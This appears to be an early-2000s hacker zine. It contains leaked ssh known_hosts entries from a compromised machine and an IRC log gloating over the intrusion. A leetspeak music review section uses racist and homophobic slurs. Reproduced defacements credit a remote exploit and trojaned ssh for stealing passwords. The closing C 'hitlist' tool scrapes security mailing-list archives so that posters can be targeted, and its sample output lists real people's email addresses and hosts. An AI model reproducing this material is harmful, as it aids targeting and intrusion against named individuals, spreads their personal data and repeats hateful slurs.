home/users/walt/.ssh/known_hosts:pav-l1.hotmail.com
home/users/walt/.ssh/known_hosts:mu.org
home/users/yowie/.ssh/known_hosts:61.12.36.180
home/users/zmagic/.ssh/known_hosts:tdz.dhs.org
home/users/zmagic/.ssh/known_hosts:zsh.interniq.org
home/users/zmagic/.ssh/known_hosts:132.170.44.12
home/users/zmagic/.ssh/known_hosts:fire.efnet.org
home/users/zmagic/.ssh/known_hosts:216.30.134.185
home/users/zmagic/.ssh/known_hosts:users.interniq.org
home/users/zmagic/.ssh/known_hosts:syn.ackers.net
home/users/zmagic/.ssh/known_hosts:stardust.europeonline.net
home/users/zmagic/.ssh/known_hosts:phear.org
home/users/zmagic/.ssh/known_hosts2:rain.ktwo.ca
home/users/zmagic/.ssh/known_hosts2:frost.ktwo.ca
<pm> hehe
*** r0b1nleech is now known as WOW ***
*** WOW is now known as r0b1nleech ***
<pm> hahahahaha
<r0b1nleech> Wow man, hotmail, efnet, ktwo!
<r0b1nleech> You are probably the best guest I have ever owned, oops, I mean
+ interviewed for lyfestylez of the owned and lamest.
<pm> thanks r0biepoos
PART THREE:
<pm> remind them about the never been owned stuff
<r0b1nleech> Caviar dreams. We have just had a guest who personifies the
+ hacker life style. He hacks, He codes, He works for google, He's worked
+ for microsoft, He's been around. And one thing I would like to point out
+ about our guest, is that he has never been owned, and never will be.
<pm> yup, never been owned
<r0b1nleech> See, owning someone this incredibly lame takes an enourmous
+ amount of skill, which of course, no one has.
<r0b1nleech> In a fantasy world, where hacking is life, pm, one of the
+ greatest lamers around, lives the dream, lives the big life, drives
+ a bmw, and hangs out in #!w00w00. What more can you ask for? I leave
+ you with this final note:
<r0b1nleech> pm, has NEVER, EVER, EVER, EVER, I repeat NEVER EVER EVER
+ EVER EVER NEVER EVER EVER EVER EVER, been owned.
<r0b1nleech> good night, suck my fat dick, and wipe that dangling shit
+ off the tip of your dick stick.
<pm> yah bye, btw
<pm> NEVER BEEN OWNED
<pm> hah, cya
.~e~----------------------------------------------------------~e~.
; *05* muz1k in the undergr0und -- uncle m4v1s ;
`----------------------------------------------------------------'
muz1k 1n the undergr0und
by uncle m4v1s
---------------
the p4zt few ye4rz have s33n a surge 0f muz1kal tal3ntz
1n the d1g1t4l undergr0und.... fr0m the 4sh3z 0f g4ngst4h
r4p c0mez a new g3nr3 0f muz1k 2 rev0lut10n1z3 the w0rld
4ever... e-thug d1g1t4l r4p. uncle m4v1s h4z k0mp1l3d a
l1zt 0f 2dayz *h0ttezt* art1ztz 1n th3 haqr subkultur3 &
s0me rev1ewz...
the ph4t be4tz and krayzEeE b4ssl1nez u he4r 1n kutt1ng
edg3 e-thug d1g1t4l r4p w3r3 pi0neered by n0ne 0ther than
the m4ster bl4zt3r h1mself, h4g1z' sh0ckwave r1d3r.
sp0rt1ng h1z d33p-runn1n m1ztruzt 0f auth0rity 4nd h1z
1ntim8 kn0wledge 0f g4ng w4rf4re, the acqu1z1ti0n 0f
1llegal drugz & weap0nz, & the cl0zely gu4rd3d s3kr3t 0f
h0w 2 h1t th3 g-sp0t in 0ver 38 unique w4yz, he sh0qd th3
w0rld by pl4c1ng sh4dy & kl3v3rly w0rd3d c4tch phr4sez 1n
h1z IRCNAME variable. h3 br0ught h0n0r 2 h1z ment0rz eazy-e
and chuck-d by pr0v1d1ng 1nexper13nz3d wh1te k1dz on 1rc
w1th 4 d4nger0us and 4st0und1ng 1ns1ght 1n-2 wh4t 1t m34nz
2 b3 black, r3f3r3nc1ng such 1rc n4m3z az "1t t4k3z 4
n4t10n 0f m1ll1i0nz 2 h0ld my saq" [see publ1k 3n3my, 54].
0ften th3z3 0bskure l1n3z w0uld s3nd phell0w f@ wh1t3 h4qrz
dr3ss3d in BDUz & k0mbat b00tz runn1ng 2 g00gl3. wh3n mb'z
st4tuz az an undergr0und br0th4 wuz f1nal1zed [see "blaq 1z
merely 4 st4t3 0f m1nd", 82] 0therz were s00n 2 f0ll0w.
so1o 0f ph4med t33n haqr/he4rtThr0bz c0deZerO k0mb1n3d
h1z sk1ll3d kn0wledg3 0f purch4z1ng n1qlb4gz & begg1ng 4
k04dz wh3n h3 c0ined th3 3ver s0-p0pular k4tch phr4ze
"y() d4wg, 5up." & the r3zt u kn0w 1z h1zt0ry.
u k4n r34d m0re inph0 ab0ut s1 in m1ke sch1ffman'z upk0m1ng
b00k ent1tl3d "br0, 1m a h4qr n0t a k0d3r"
(ISBN 835827577158).
th0 d1g1t4l thugz in tha 2K+2 may !have (th4tz a l0g1k4l
neg4t10n, or "n0t have" 4 u untekn1k4l read3rz) even h34rd
0f nw4, they st1ll r3pruhz3nt the s4me c0ld he4rt-0f-
d4rkn3zz / str8 phr0m s0uth c3ntr4l m3nt4l1ty th@ fu3l3d
f34tz 0f m4str haqry 1n the m1d 90z, such 4z the t4ktik4l
l0gic-b0mb 1mpl4nt3d 1n-2 yah00. s0me k0mpl41n th@ the 1rc
thugz 0f the new m1ll3nn1um h4ve l0st ph0kuz 0f kreat1ng
hypn0t1z1ng phreakyPhr3$h phl0w & r 2 kaught up 1n s3ll1ng
drugz 0n 3fn3t 0r putt1ng up p1cz 0f the1r n3w r1mz 0n
th31r h3rt.0rg h0mepagez, but u k4n dec1de 4 y0urself.
ytcracker [the 0r1g1n4l d1g1t4l g4ng3r]
---------------------------------------
th3 f1rzt 2 expl1c1tly use the t3rm '0r1g1n4l d1g1t4l
g4ngst4h' when h3 gr4ff3d h1z mug 0n th3 dcaa website
11/23/99. the e-g1f p1ktur3, l00s3ly b4s3d 0n 4 ph0t0
t4k3n dur1ng th3 #sesame str33t 1rc sh0wd0wn sh0wz a
rugg1sh thugg1sh y0ung yT, dr3zz3d 4 b1t l1ke kR4zy t3d
k4cz1nszky [s33 http://www.paybackprod.com/hackedsites/dcaa]
w1th wh4t app34rz 2 be a huge g0ld ch41n k00l3ct3d
phr0m 3 m0nthz 0f p4wn1ng m0sth8d's e-l00t. th0 2 many @
ph1rst gl4nc3 h3 appe4rz 2 be we4r1ng a pe4c3 symb0l,
rum0rz circul8 th@ yT l00ted th1z r3l1c 4ft3r gunn1ng
d0wn a f4m1ly 0f as14n sh0p0wn3rz 1n k0ld bl00d
in the inf4m0uz LA ri0tz. st1ll 0therz s4y 1t 1z n0t a
p34c3 symb0l @-all, but r34lly a h00d 0rnament st0len
phr0m shuge kn1ghtz benz!! whut3v3r the true st0ry 1z,
ytcraqr h4z k0nt1nu3d 2 1nsp1r3 y0ung e-thugz w0rldw1d3.
1t 1z rep0rt3d th@ ytkrakr mp3z r h3r4d 4z f4r away az
k4r4ch1, wh3r3 h1z pr0tegez gf0rce p4k1st4n h4v3 sh0qd
l0c4l m0squez by bl4stn d1g1t4l h1ph0p 0uts1d3.
1n p4k1st4n, wh3r3 l1n0leum phl00rz r unava1lable, 0ne
gf0rce member, german_gu c4us3d qu1te a st1r by bec0ming
the ph1rzt musl1m bb0y 2 buzt 0ut 1n2 a w1ndm1ll 0n hiz
pr4y3r m4t.
unphortun4tely, m0zt 0f yTcr4ck3rz w0rk 1z unr3l34z3d, &
un4v4il4ble 4 d0wnl0ad. but 2 m4ny, th1z d0eznt m4tt3r,
4 th0ze wh0 v1e3 h1m 4z an 1k0n 0f s1n & rebell10n.
yt iz str8 up p10n33r.
r00tabega
---------
4z they r kall3d 0n their page, "r00tabega: 1ndepend3nt
hyde p4rk h1p h0p." damn h0w d0 i descr1be th1z except
az 'pr0l1f1k.' bansh33 p0pz 0ut new rele4s3z ph4ster
th4n 0l d1rty bast4rd k4n get b1tchez pregn4nt.
u k4n ch3ck 0ut th3z3 b34tz @
http://www.r00tabega.org/rap
th31r l8zt release 1z kalled 'the c0c00n' & m4n 1tz
exxxxxxxxxXtra phantast1kly phre$$$$$$$$$h.
r00tabegz phearl3zz leader 1z r1shi bh4t, u m1ght
r3m3mb3r h1m az th3 ugly l1tl krumbsn4tchr phr0m th3
ph1lm 'th3 1nd14n 1n the cupb04rd.'
u kan ch3ck h1z interv1ew @
http://www.rediff.com/chat/trans/0216rish.htm
4z we k4n c y0ung r1sh1 1z a k0l0rful ch4r4ct3r; he
st4rt3d haqng PRIMOS @ the age 0f 6, & wuz 1nsp1r3d
2 freestyle apht3r 0wn1ng h1z 1zt DMS100. wh4t d0ez r1sh1
d0 4 fun? w3ll the maztr h1mself repliez: "Programming,
Tennis, Piano, Clarinet, Rapping."
r00tabega, wh1ch ink0rp0r8z inkredible muzik4l/haqng
t4l3ntz such as the 1ncred1bl3 "busdr1v3r" (hehe he g0t
th1z n4m3 k0z he takez u all 2 sk00l!) and bansh33, r
seen by m4ny 4z a resp0nse 2 the 1nf4m0uz "ICY HOT
STUNTAHZ," an0th3r tr10 0f rap superstarZzzZ wh0 h4v3
b33n kn0wn 2 frequent the 3r1z PHR33 netw0rkz but d0 n0t
h4ck. 2 bansh33 th1z 1z 4ll th3 d1ff3r3nc3. wh3n 4sk3d
ab0ut h1z op1n10n 0f the 1cy h0t stunt4hz h3 pau4z3d 4
a m0ment, t0ld me 2 "h0ld up d4wg" and st4rt3d t4pp1ng
h1z f00t (he 0nly wearz LuGZ), 4nd r4pp3d @ me:
"y0 phuck 1cy h0t kuz theyre cheaterz... everyb0dy kn0wz
cuz wez eleEeter.... 1f 1 ever s4w bl4d3 1d st4b h1m
w1th a t00thp1ck, 1c3 l1v3z w1th h1z m0m & 1 h34r
fl4m3z g0t a sm4ll d1ck.... y0 y0 aiy0 d0nt step 2 my
krew, kuz 1ll fuqn k4p y0u. f00. t4p t4p ch3q." d4mn! iz
all i k4n s4y, koz th3 c0c00n 1z full 0f th1s sh1t.
4ngry lyrix... th3y t4lk ab0ut st4bb1ng th3ir l4wyerz
1n c0urt, dr1nk1n 40z wh1le talkin on th4 I SEEK Y0U,
buztn 0ut 0f j41l l1ke n3d k3lly, b1tch3z 1n h1gh sk00l
th@ cheat 0n algebr4 t3stz, h0w much p4y1ng ch1ld supp0rt
4 a bunch 0f k1dz suxxxx, m4n 1 d0nt even want 2 sp0il th1z,
itz tru-thug.
pers0nally my fav0r1te tr4ckz 0f th1z cd r #2. CHEATERZ &
#11. THE COURTR00M and 13. SH0W THEZE k4TZ (lab3ll3d 0n
th31r webs1te az *H0T*).
wh4t3v3r they d3c1d3 2 d0, r00tabega k33pz a p0s1t1v3 1m4g3.
r1sh1, 4z y0ung 1nd14n b0y gr0wn up 1n th3 gh3tt0 h4d 2
s1t by and w4tch h1z y0unger br0ther wear1ng a ch1cag0 bullz
jerzey get gunn3d d0wn 2 d34th by cr1pz. s331ng s0 much
vi0lence in h1z d4y, & w4tch1ng h1z g00d h0meb0yz m0st8d
& l00ph0le & m1ndphazr g0 2 the p3n, he m0urnz 4 th31r
return & the dayz 0f tru defac3m3nt thugg3ry. 1n hiz s0ngz,
he expl41nz, h0w new sk00l def4c3rz just d0nt underst4nd
what 1t uz3d 2 m34n 2 the el8z, the gHerz, the 3lv3z.
th1z album 1z def1n1tely a 2 thumbz up.
w00w00
------
ch3ck 1t 0ut @ http://www.w00w00.org/w00w00.mp3
w1th 0ver 30 memb3rz w0rldw1de & th1z 1z the b3st sh1t they
k0uld k0me up w1th!?!?!?!?
th1z 1z fuqn kr4p, 1tz even w0rse than th31r k0d3z.
w0uld u listen 2 a k0p r4pp1ng? 0k damn, s0 why the phuq
w0uld u l1st3n 2 a bunch 0f wh1teh@ l4m3rz pr3t3nd1ng 2
haq. 1f 1 were 1n the wu-t4ng kl4n 1 w0uld kut their n*tz
0ff, espec14lly th@ n4spt3r f4g.
m1xt3r
------
0k well th1z 1znt r34lly "thugg1sh" but 1tz undergr0und
h4qr muz1k s0 uncle m4v1s dec1d3d 2 rev1ew 1t just 4 u.
& th1z 1z n0 disappo1ntment e1th3r. m1xter haz sh0wn he
d0eznt just kn0w h0w 2 wr1te wh1tepap3rz 4 packetst0rm,
he k4n als0 wr1te s0me ph@ muz1k 2!
m1xt3r d0eznt even try 2 be a thug, h3z just pure h4qr.
w1th s0ng n4m3z like "/usr/bin/strings" and "1ntrusi0n
det3kt3d" and "/cgi-bin/phf?Qalias=%0acat%20/etc/passwd."
1 def1n1tely w0uld n0t rec0mmend th1z 4 l1st3n1ng 2 pe0ple
outs1d3 0f the 'sc3n3' becuz it iz 1nf0rmation 0verl0ad!
but 4 th0ze 0f u wh0 th1nk u h4v3 wh4t 1t t4k3z 2 dec1ph3r
hiz kryptik msgz, u k4n f1nd h1z muzik @
http://www.mp3.com/mixter/
th3z3 s0ngs rem1nd me a l0t 0f th1z 0ne t1me 1 s4w th3z3
2 austrian d00dz french k1ss1ng each0ther in an 'E wild 0n
1b1z4.' but enuf of th@
/usr/bin/strings s0undz a bit retro, with s0me atar1 l1ke
s0undz 2 rem1nd u of exactly h0w 0ld sk00l m1xter really is,
& synthlinez th@ w0uld bl0w depeche m0de 0ut 0f the w4t3r.
m1xt3r, as he l1k3z 2 r3f3r 2 himself az 'DJ MIXY' 2 th3
r3st 0f the w0rld 0fferz h1z serv1c3z 2 th3 c0mmun1ty
by dj'ing in s4f3 drug phr33 b4r m1tvahz in t3l av1v,
where h1z t0pn0tch internet sekur1ty k0mpany w1th phell0w
h4ck1ng st4rz ANALYZER and IZIK of hwa-security/d4rkn3t
1z l0c8d. s0met1m3z when he iz juzt "chiln 0ut" he k4n be
f0und d4nc1ng @ w1ld r4v3z @ the g4z4 str1p w1th h1z
p4t3nt3d redwhite'nblue gl0wst1ckz & vickz inh4l3r. but
h3 d03z m0st 0f h1z w0rk 4 fr33, s1nc3 az m4ny grey/bl4ckhatz
he shunz the c0mmercializ4t10n 0f s0phtjuarez & releasez hiz
trax under GPL! he als0 h0pez th@ 0ne day s0meb0dy w1ll B
insp1r3d by h1z s0ngz 2 0wn a univers1ty netw0rk w1th m1cr0s0ft
w1nd0wz src k0de & d0n8 the ph1nd1ngz 2 him! ~el8 4tt3mpt3d
2 k0nt4kt mixter 4 an 1nterv1ew ab0ut h1z muz1k but he angrily
d3kl1n3d, s4y1ng he w0uld never 't4lk 2 u squinty 3y3d
m0th3rphuckrz' as l0ng 4s 'th3 br34th 0f l1fe fu3l3d h1z
b0dy.' h3 th3n ch4ll3ng3d uncle m4v1s 2 "get my passw0rd
ph1le again" s1nce h1z b0x d0eznt all0w 0utg01ng em41lz 2
j4p4n anym0r3.
th1z wuz unfphortun8 but 4 the s4ke 0f 0bjekt1v1ty uncle
m4v1s g1vez thiz album a "p0sitive" rev1ew.
y0 well th@z all the muz1k 1 k0uld find 4 n0w!
r3m3mb3r 2 k33p 1t r34l
peace 0ut d/-\wGz.
.~e~----------------------------------------------------------~e~.
; *06* defacements of the milenium -- ~el8 ;
`----------------------------------------------------------------'
-----------------------.
anti.security.is owned 0 ~~~ :PpPPppPPPp
-----------------------'
turkey Oh, life it's bigger, it's bigger than you and you are not me
The lengths that I will go to, the distance in your eyes
WE ARE THE HACKERS WHO ACTUALLY HACK.
UNLIKE OTHER "HACKERS," WE DON'T SIT ON OUR WAREZ.
ACTION SPEAKS LOUDER THAN SILLY WORDS.
GOBBLES IS ABOUT GETTING THINGS DONE.
THANKS TO THE POP PSYCHOLOGISTS ON THE ANTISEC MESSAGE BOARD. YOUR
COMBINED PSYCHOANALYSIS MISSED UNCONTROLLABLE URGES TO DEFACE SECURITY
WEBSITES THOUGH!
2002 IS YEAR OF TURKEY. MAKE NO MISTAKE ABOUT THIS.
AND THERE'S NOTHING ANYONE CAN DO...
THIS HACK MADE POSSIBLE WITH BITCHX REMOTE EXPLOIT AGAINST JIMJONES
HOME COMPUTER THEN TROJANING HE SSH TO COLLECT PASSWORDS...
------------------------.
udp's livejournal owned 0 ~~~ :PpPPppPPPp
------------------------'
[2041] udp the lame phrack whore's LiveJournal
[Most Recent Entries] [Calendar View] [Friends]
Below are the 20 most recent journal entries recorded in udp the lame
phrack whore's LiveJournal:
[ << Previous 20 ]
Monday, December 31st, 2001
12:42 pm Been rereading Leisure Town and laughing my ass off. (Comment
on this)
11:38 am owned in the 2002
yo chek it, im fat & owned
keep it re4l
libnetx25
el8.8m.com
watch your back
we out (Comment on this)
Sunday, December 30th, 2001
4:12 pm Add Hope Sandoval to the list from the 25th. Fantastic. :)
Current Music: Mazzy Star - Wild Horses(2 Comments |Comment on this)
1:38 pm mmm. the big chill. you must get this track.
Current Mood: chillllled
Current Music: Mescalito - Shoreditch Oyster(Comment on this)
1:23 pm Desi-derata.
Current Mood: caffeinating
Current Music: Mescalito - Dark Corner Light(Comment on this)
Saturday, December 29th, 2001
10:10 pm hrm. looking at wmglobe, again, it seems most of the
populated human world is in darkness right now. whack. the sun's
shining high above the pacific; the pacific's enormous.
Current Music: Veruca Salt - Bodies(Comment on this)
3:14 pm Obviously CURRENT doesn't like my dirty hack of hijacking the
IPPROTO_RSVP pointer in ip_protosw[]. (Comment on this)
3:09 pm the sun is out. free of its grey bonds finally. eclectic love
washing over the city. (Comment on this)
2:57 pm Bah! I just loaded my driver into -CURRENT - BOOM! Works fine
on -STABLE though. Oh well, hacking time... (Comment on this)
11:47 am
Protected A rare sighting
*o* mudge [~mudge@0nus.l0pht.com] has joined #cdc
*o* irc.carrier1.net.uk Saturday December 29 2001 -- 11:44:25 +00:00
Hm! Just as I was about to head out for lunch, too... (Comment on
this)
11:43 am Musings on zen and singing.
An overcast day in London today. Dull grey cloud settled over the city
like white taffy, hydrogenated, a smooth constriction. I rise, wash,
put my boots on and make coffee. I feel the cool air rise against my
damp, freshly depilated skin. The thermostat clicks as the heater
switches off, the aesthetic of warmth lost on the machine, for it is
thus.
I run my hand over my forehead, and around my fringe. I smile, knowing
what it is to live in the moment, and that though our best laid plans
and fondest dreams may never come to fruition, living in the moment is
that which is most important.
After a spate of not being able to sleep well, I suddenly find myself
enjoying the most pleasant, restful night's sleep, and this has been
the case some three nights in a row now.
Last night my final thought before leaving wakefulness was this: how
does Kate Bush feel about her success and her life? I wonder if she
has always wanted to be where she has gotten to. I think one could
well ask these questions of any successful person. Is it atypical to
be blown off one's original course, and yet still discover one's own
New World? Or is it an occupational hazard?
When hungry, eat. When tired, sleep. (Comment on this)
12:25 am There are some screen grabs of my desktop from today here. (3
Comments |Comment on this)
Thursday, December 27th, 2001
1:26 pm Ok. I submitted 7 new FreeBSD ports inside 12 hours. Can I
have a biscuit? (2 Comments |Comment on this)
7:24 am Submitted FreeBSD port for x11-fonts/gfe (GNU Font Editor
0.0.4). (Comment on this)
Wednesday, December 26th, 2001
10:05 pm Without memories, a race has no future. (3 Comments |Comment
on this)
Tuesday, December 25th, 2001
1:20 pm A quiet day of fond restitude, for the weary traveller.
Mmmm. Having a very chilled out Yule; curling up with some Baileys and
wotnot, listening to music and reading books. What a holiday should be
at this time of year, I think. A time to nurture dreams anew and sow
amongst the furrows of the psyche.
Been on a different tack with mp3 playlists lately, need female
vocalists to pace out all this D'n'B, industrial, trance... so this
manifests itself in the form of Tori Amos, Paula Cole, Beth Orton,
Alison Moyet, Louise Post (of Veruca Salt fame), Sarah McLachlan, and
of course, Kate Bush.
As for the delectable Ms Bush, she will hopefully have an album out
during 2002, which I am looking forward to with anticipation. I still
hold Wuthering Heights to be one of her best tracks of all time... In
the meantime, you might like to check out Paula Cole's work. She
teamed up with Peter Gabriel on his Secret World Tour in 1993, and you
can hear her passion, and diverse vocal range, on tracks such as Talk
To Me and Hush Hush Hush. Those of you who are fans of Peter Gabriel
also will also clock that Peter's last longstanding female vocal
partner was... stand up, Kate Bush!
As a longstanding fan of Peter's work I have to say I admire his knack
for working with the female voice. He confessed that it was a skill he
acquired over many years, in an interview on ITV (1993, UK); indeed
much of his work from the late 1970s, after he split from Genesis,
took on more of a masculine edge than what one experiences from his
albums So (1986) and Us (1992); the latter was produced by the
brilliant Daniel Lanois, featured on U2's superb Achtung Baby (1990).
Paula, however, reveals a much flirtier side to her work, in a song
from the motion picture soundtrack for the Wim Wenders film City of
Angels, a track entitled Feelin' Love. As you can see from the lyric
sheet, it's quite candid, but you really have to hear her singing
this; she manages to come across as sensual without being kitsch or
trashy. It's a departure from her other tracks, lest we begin to think
the adorable Miss Cole is a goody two-shoes.
I can't really put into words how enthused I am by her talent. Her
voice helps to create a fertile creative space for me; it's only over
the past two years or so that I've begun to realize how essential the
immediate environment is to the creative act, be that making music,
writing code, sculpting; or any other form of play.
Isolation alone is not the way to get the job done; often it's good to
invite a bunch of friends over, share the Baileys or Jasmine tea or
whatever the tipple is, and then return to one's work, having given
the machine-mind a rest and returned to social consciousness, if only
for a few hours.
My plans for 1Q 2002 are still being worked on; I also need to decide
what to do this upcoming summer. I'm open to suggestions for places to
visit, hang out, have a good time.
And like that rubberband girl in the red shoes, I bounce back on my
feet. Fond greetings to friends present and past, in whatever mode you
choose to celebrate the Solstice; I wish you all well.
Current Mood: pleasantly inert
Current Music: Kate Bush - Rubberband Girl(1 Comment |Comment on this)
Thursday, November 29th, 2001
2:16 pm Just woke up. Urrrrrrrrgggggh.
Upgraded the -CURRENT box late last night - the change alone from a
Realtek to an Intel FXP makes a *massive* difference. FreeBSD now
supports every single bit of hardware in the box. Matt Dillon gave an
interview very recently where he cites the current SMPng work and the
OpenGL support as the main hurdles to be overcome for FreeBSD at the
moment. I agree - once OpenGL support is in place, I will have very
little reason to run Windows, or even Linux, for that matter, ever
again. One exception is IrDA support, but I might choose to port that
anyway.
Anyway. I'm eating a pot rice at the moment, deferring real food until
we (people are here) decide what we're going to do. *stretches*
(Comment on this)
Wednesday, November 28th, 2001
11:11 am Is it any wonder I can't sleep? (apologies to Smashing
Pumpkins) Woke up at 10pm last night, my sleeping pattern is TOTALLY
shafted... it's out of control, and the kids just love it! (props to
KMFDM...)
As of this morning I've written FreeBSD ports entries for Dug Song's
libdnet, a portable packet generation and low-level networking API,
and Tony Curtis's wots, which is an extremely cool system log
monitoring program written in Perl. I've been using wots for literally
years now. Rock on. Hopefully other people will find them useful.
qtop is working spankingly for my droptail queues on the WaveLAN
gateway, but I need to clean up the code, fix it to work with RED/wRED
dispatcher, and get it committed to FreeBSD-CURRENT.
Current Music: Technical Itch - Deadline(Comment on this)
Monday, November 26th, 2001
9:25 am Access granted.
I've just written and released a tool to perform real-time monitoring
of the FreeBSD Bandwidth Shaper, as part of the Consume Project. It's
essential that we be able to throttle bandwidth on a per-node basis to
prevent wired links to the mobile cloud becoming saturated. This tool
will help us to configure the bandwidth shaper at each node.
Getting the hang of the masking for the packet flow sets is quite
tricky; this will help the community networking effort by allowing
people to experiment with bandwidth throttling and getting visual (as
well as anecdotal) feedback on the effect of their configuration
changes.
You MUST get the track I'm listening to. At the moment I'm pretty
frazzled on caffeine having been awake for most of the weekend and
Friday, and have the heating turned down to keep me frosty.
Oh yeah. What else is cool. ParMaster hung with us at the weekend.
Current Mood: accomplished
Current Music: Apoptygma Berzerk - Kathy's Song (Ferry Corsten
Remix)(1 Comment |Comment on this)
Monday, November 19th, 2001
3:06 am ick, writing parsers is such a chore. (Comment on this)
[ << Previous 20 ]
My Website About LiveJournal.com
.~e~----------------------------------------------------------~e~.
; *07* ~el8 hitlist tools -- uncle m4v1s ;
`----------------------------------------------------------------'
~el8 ~el8
has has
generated generated
hitlists hitlists
for for
every every
security security
related related
mailing mailing
list list
known 4r3z known
to urfukd to
mankind mankind
h3re y0u g0 d00dz, str8 fr0m the ~el8 w4r3z gr4bb4g. th1s t00l w1ll
h3lp 0ur f0ll0w3rz by cre4t1ng h1tl1sts of emails/systems that p0st
t0 vari0uz security f0cus mailing lists.
~el8 ADVISORY STYLE S0LLUTI0N: d0nt p0st t0 th3z3 mail1ng lizts
ex4mple 0utput: $ ./hitlist 1
LAMER: sh0@libertynet.de (sh0)
LAMER BOX: cybersilo.lnx
LAMER: tsmith@zonelabs.com (Te Smith)
LAMER BOX: mail.securityfocus.com
LAMER: merchantjosh@qwest.net (Joshua Merchant)
LAMER: draht@suse.de (Roman Drahtmueller)
LAMER BOX: dent.suse.de
LAMER: secnotif@microsoft.com (Microsoft Product Security)
LAMER: newsflash@macromedia.com (Macromedia Security Alert)
LAMER BOX: rsigate.macromedia.com
LAMER: joacim@axis.com (Joacim Tullberg)
LAMER BOX: mail.securityfocus.com
LAMER: tluce@pti-pump.com (Timothy Luce)
LAMER BOX: PTIPump.com
LAMER: support_feedback@us-support.external.hp.com (IT Resource)
LAMER: wichert@wiggy.net (Wichert Akkerman)
LAMER BOX: wiggy.net
LAMER: raistlin@gioco.net (Raistlin)
LAMER: cadence@apollo.aci.com.pl (Tomasz Grabowski)
LAMER: dotslash@snosoft.com (KF)
LAMER BOX: snosoft.com
LAMER: flatline@blackhat.nl (flatline)
LAMER BOX: mail.werkopmaat.nl
LAMER: adonis1@videotron.ca (Adonis.No.Spam)
LAMER BOX: videotron.ca
LAMER: gobbles@hushmail.com
LAMER BOX: mailserver1.hushmail.com
LAMER: seclsts@fast.net (Rich Henning)
LAMER BOX: fast.net
LAMER: alexm@pycckue.org (alex medvedev)
LAMER: pr0ix@def-con.org (pr0ix)
[CUT_HERE] hitlist.c
/*
* l4m3r l1zt3r v1.0 by uncle m4v1s
* th1z 1z a s1mple t00l th@ ~el8 haz been uzing 4 several ye4rz,
* ever s1nce pr0ject m4yh3m wuz 1st st4rt3d.
* 1tz a 1-use t00l, juzt run th1z on any 0ne of the k-l4m3
* s1tez upd8d by secur1tyf0cus.com on the1r ml-p0rtal, &
* u n0w h4ve a l1zt 0f ret4rdz 2 hack and st34l "0day" from.
* th1zt skr1pt g0ez back s3v3ral ye4rz s0 u get the ch4nc3 2
* ch3ck 0ut r34l b0xez th@ were uz3d be4 the gr34t p4n-l4m3r
* 3ff0rt 2 get sc3n3 sh3llz 2 h1de the1r 1dent1t3z.
* by t4rg3tt1ng p0stz by p0l1te sekur1ty pr0fess10nalz &
* 0wn1ng the1r `sh1t` and r4v4g1ng th3 kn0wn_h0stz 0n the ab0ve
* b0x3z, we n0t1c3d the subtl3 c0rrel4t10n betw33n m4n & myth,
* 4nd st4rt3d 2 rek0gn1z3 the k0rrel4t10n betw33n REAL PEOPLE &
* the 0nl1ne 1dent1t3z they assum3d. 4 example, 0wn 4ll russ14n
* bugtraq p0st3rz s1nce 1997 and u w1ll n0t1c3 4t l34zt 0ne 0f
* th3m l0gg1ng 1nt0 z0l0.fr33lsd.n3t/c4nn4b1z.dataf0rce.net (hi str!)
* 4nyh0w, 4z rule #2 of pr0jekt m4yh3m g0ez, if u c4nt st34l w4r3z
* 0r sn1ff, rm the fukrz!
* h4ppy hunt1ng
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <ctype.h>
#include <netinet/in.h>
#include <netdb.h>
#define PREFIX "GET http://online.securityfocus.com"
#define BASE_CMD "GET http://online.securityfocus.com/archive/1"
struct sockaddr_in sinz;
struct target{
char *lamercode;
char *url;
} targets[] =
{ {"ARIS USERZ","GET http://online.securityfocus.com/archive/114"},
{"bugtraq[lol]","GET http://online.securityfocus.com/archive/1"},
{"bugtraq-es (bugtraq in spain jajaja)",
"GET http://online.securityfocus.com/archive/80"},
{"bugtraq-jp & shadowpenguin friendz",
"GET http://online.securityfocus.com/archive/79"},
{"cisspstudy [inspired by dr. crispin cowin]",
"GET http://online.securityfocus.com/archive/99"},
{"focus-ids [cant sekure a b0x so they use ids]",
"GET http://online.securityfocus.com/archive/96"},
{"choose this if u have linux 0day",
"GET http://online.securityfocus.com/archive/91"},
{"choose this if u have win32 0day",
"GET http://online.securityfocus.com/archive/88"},
{"choose this if u have solaris 0day",
"GET http://online.securityfocus.com/archive/92"},
{"scan here for bo2k",
"GET http://online.securityfocus.com/archive/100"},
{"forensics (prolly not worth it, they r already 0wned)",
"GET http://online.securityfocus.com/archive/104"},
{"honeynet [leave burneye encrypted kopiez"
" of nmap 4 lance sp1tzner here]",
"GET http://online.securityfocus.com/archive/119"},
{"incidents [see how well pr0ject m4yh3m is d0ing",
"GET http://online.securityfocus.com/archive/75"},
{"pen-test [people like s1 here hehe]",
"GET http://online.securityfocus.com/archive/101"},
{"sec-papers [4 the literary inkl1n3d like warzael zarcae",
"GET http://online.securityfocus.com/archive/112"},
{"security-basics PAHAHAHAHAHA n3wb13z ripe 4 the picking",
"GET http://online.securityfocus.com/archive/105"},
{"security-certification [l4m3rz who have subskr1b3d"
" 2 security-basics longer than 2 weekz",
"GET http://online.securityfocus.com
/archive/106"},
{
"security-jobs [own theze fuckerz quick, they r desperately"
" trying 2 publish 0day]"
,"GET http://online.securityfocus.com/archive/77"},
{"vpn [hehe launch pptphack here]",
"GET http://online.securityfocus.com/archive/50"},
{"vuln-dev <- th3 m0ther l4m3r sh1p h4z l4nd3d",
"GET http://online.securityfocus.com/archive/82"},
{"choose this if u have shopping kart cgi po1z0n byte warez",
"GET http://online.securityfocus.com/archive/107"}
};
void printdates(char *url)
{
char *ptr;
int bday,bmonth,byear,eday,emonth,eyear,num;
#define MAGIC "/archive/1/"
ptr=strstr(url,MAGIC);
if(ptr==NULL) return;
num=sscanf(url, "/archive/1/%d-%d-%d/%d-%d-%d/"
,&byear,&bmonth,&bday,&eyear,&emonth,&eday);
printf("LAMER CHRONOLOGY: ");
if(num!=6)
printf("ERROR IN PARSING BUT WH0 KAREZ\n");
else
printf ("%d/%d/%d to %d/%d/%d\n",
bmonth,bday,byear,emonth,eday,eyear);
fflush(stdout);
}
char *makeurl(char *end)
{
char *r;
int size=strlen(PREFIX)+strlen(end)+4;
r=malloc(size);
if(r==NULL){
fprintf(stderr,"hmm out 0f memory... might be 4 f0rq b0mb!\n");
system("ps -u cr");
exit(-1);
}
memset(r,0,size);
strcpy(r,PREFIX);
if(*end!='/')
strcat(r,"/");
strcat(r,end);
strcat(r,"\r\n");
return r;
}
